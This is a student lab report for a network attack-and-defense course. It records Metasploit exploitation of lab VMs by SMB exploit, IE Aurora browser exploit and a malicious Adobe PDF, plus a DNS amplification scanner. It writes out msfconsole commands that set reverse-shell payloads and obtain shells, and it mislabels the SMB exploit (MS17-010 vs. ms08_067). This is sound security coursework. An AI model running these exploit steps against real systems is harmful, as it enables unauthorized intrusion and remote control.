20202421 2022-2023-2 《网络与系统攻防技术》实验六实验报告

Menethilii 2023-06-08 17:29:58

1 实验内容

1.1 实验目标

掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。
具体需要完成:
1.一个主动攻击实践,尽量使用最新的类似漏洞;
2.一个针对浏览器的攻击,尽量使用最新的类似漏洞;
3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
4.成功应用任何一个辅助模块。

2.1 一个主动攻击实践

· 漏洞名称:永恒之蓝(MS17-010)
· 攻击方:kali linux(64位)IP:192.168.42.92
· 靶机:windows xp(32位) IP:192.168.11.132
先在msf控制台中查询关于该漏洞的相关信息,在msf控制台输入 search ms17_010 命令,我们可以看到有关该漏洞的模块信息。

 445端口开放

2.1.3 进行攻击

先进入msfconsole工作台。

search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp

img

出现meterpreter >说明攻击成功 ,可以获取shell。

2.2 针对浏览器的攻击:ms10_002_aurora

极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用的shell,同时会严重占用目标机器的CPU,导致机器卡死。

2.2.1 查找漏洞存在

使用msf查找MS10-002漏洞

img

 use exploit/windows/browser/ms10_002_aurora 
 set SRVHOST 攻击机ip
 set srvport 端口
 exploit 

img 

img 

成功获得shell

2.3一个针对客户端的攻击
 

Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。

 

 

查找search adobe_cooltype_sing 
调用use exploit/windows/fileformat/adobe_cooltype_sing/

设置set payload windows/meterpreter/reverse_tcp

set LHOST 

set LPORT 

set FILENAME pdf

exploit  

随后开启监听在靶机上打开文件 成功获取shell

2.4 辅助模块应用

一共1200个辅助模块,选择scanner/dns/dns_amp模块,用来扫描dns。 

3.问题及解决方案

在向虚拟机复制文件时无法复制,安装vmtools解决

4.心得体会

本次实验采用了metasploit进行了多种攻击,初步掌握了metasploit的使用方法,同时也理解到漏洞的了解以及相关知识非常重要,只有了解了漏洞才能进行攻击以及防范攻击

 

...全文
108 回复 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

93

社区成员

发帖
与我相关
我的任务
社区描述
网络与系统攻防技术课程作业
网络安全系统安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧